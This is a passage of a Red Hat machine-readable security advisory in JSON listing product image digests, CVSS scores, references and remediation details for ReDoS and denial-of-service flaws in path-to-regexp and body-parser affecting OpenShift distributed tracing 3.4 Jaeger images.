3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "path-to-regexp: Backtracking regular expressions cause ReDoS" }, { "cve": "CVE-2024-45590", "cwe": { "id": "CWE-405", "name": "Asymmetric Resource Consumption (Amplification)" }, "discovery_date": "2024-09-10T16:20:29.292154+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2311171" } ], "notes": [ { "category": "description", "text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", "title": "Vulnerability description" }, { "category": "summary", "text": "body-parser: Denial of Service Vulnerability in body-parser", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-45590" }, { "category": "external", "summary": "RHBZ#2311171", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590", "url": "https://www.cve.org/CVERecord?id=CVE-2024-45590" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590" }, { "category": "external", "summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", "url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce" }, { "category": "external", "summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", "url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7" } ], "release_date": "2024-09-10T16:15:21.083000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-11T16:47:10+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:b9b2c61785f82ca784c957898412726a37c4fe81351c1bf7538d45229adabd8b_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:bb1d9ea1ef3e98740a6a4fd64e27c74b9ecc6849a3b4adc8c1d3a0289adca4f3_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:da3915ec0e08f9e14be5520bc92a318308a4e2a514f19f74a54b8c922f7df9df_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10962" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:2a199dfb119a0a9e23cfb6ad30f3715c9219bb8fa880a8a41977829d763a4ca5_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:3a719c39310ec4c664a3e49bf899f070e46be72b7594ce73d335c549b474146f_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:a7ae101cffca890f8665237b153e97b6dc1b3a6b672eaeccdbe4bfbd7aedce17_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:b541c30e0c0180612046cc31c639b219f6e9f4c7ae2e631b6f03404b7d55ee1d_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:952f5a651c58cf3f86ded53cdd03649e3c7cb5c91199fd42bf2333e2ae48cce2_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7bcd8d1986f24bc0996360cc6c5eff80d57b3802969740a44ce98484113c1c8_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:ceab26a0939aeb7c4280ff8ff8c8607087838ef37a429e5f8d5f2fa663f5e4fa_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:eebbda52e7853c58f638a0e9ac19f2523396358b92a08c026233b6a9b6e3eb38_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:00481eba92932c2e8dcff9c2e74414423a95cdf7e158a081ac9b6ce64e095053_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0e8aefb95c5605a7b986c2765417118217962a69a803b38b0d5b5da9ee18ed7a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:6a073cd60d81bff01283dd4cbf680cfc7a17aa42cd262ae5ad4460142a2b5ec0_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:bf43ff8bf24eaf6694abfe3ba0ad34223743ac80473a7284aeb6e30c8b6f7a09_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:43a162e333dc9d7b3d78102ea1ad0edfdc5f83eda53416c26c352f64ce03648e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:6d2163a0d54b4ca742e2669a1cf6145abaf8681fe68bfaf7b0adf3e386979f5a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:b0a964e6cfabcab6b24a7caaac935304ab00bf5aac4a2895bebd78dc8dcc93cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c81395f94df15ee18eefd08b0b0e83cac7e7a266558a1458cfa769504c49a1c5_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:60aecc2ebb419a5dd979e503b9475af9b1def1ca82fcd9d4b96a05bc3a0686d6_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8a85c82050ca4a430ebeabb6192debca6daee99d9baa0cf96b156790f0984d02_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fd196cb2a9c3780ca1de2a6974bd3c2042c09bebf8a5c5a27bf5e51140a14e33_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:fed0a62dffeb3fc63a57c54b66194d1fb754cb89ec0d8aa0f9a303d3fc494857_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:44d844bd4f1c83b7ee66645a8f0e3c71c5f3fa84ee62553058c15106d8782a69_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c254cbefa1a0d57fbd1a4925254de1d6568cafa6b26be59db1df38142ab2256c_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e537e8f52fe57bb5ec047054e7a5f7e26a96d5ac52b85623cf56c946c93032cf_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:e8cc4fc4b0d5b3238a6441acd162d5e8bba35c51a1bab2f2ff87b812c5ded866_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:44b22b250cdf29c29cf8c71941ea9ffd84c8bc7f4fddffafcd1b194a125d9028_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:78b4c8cb7e68b33fbd0cfb502a2d4e3ca09eeb6168d525c80ae0a45775364952_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:8d0e9eb0894de1289dfa9556cf9411874df3111f3e84471256de6b2d75ecd829_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:e7814650195a4ce28137f26da766217ed09dc2d974146b73fefb50b3e3c63749_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:fe5c0636b57f316157812488029f3346363031b3e216dbc82ed9897a2d1347ab_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4347e8a28b5a964fcab8ab237e5d93aef6f07ec9400e34a539dccb9d101b6fde_arm64", "Red Hat OpenShift distributed tracing 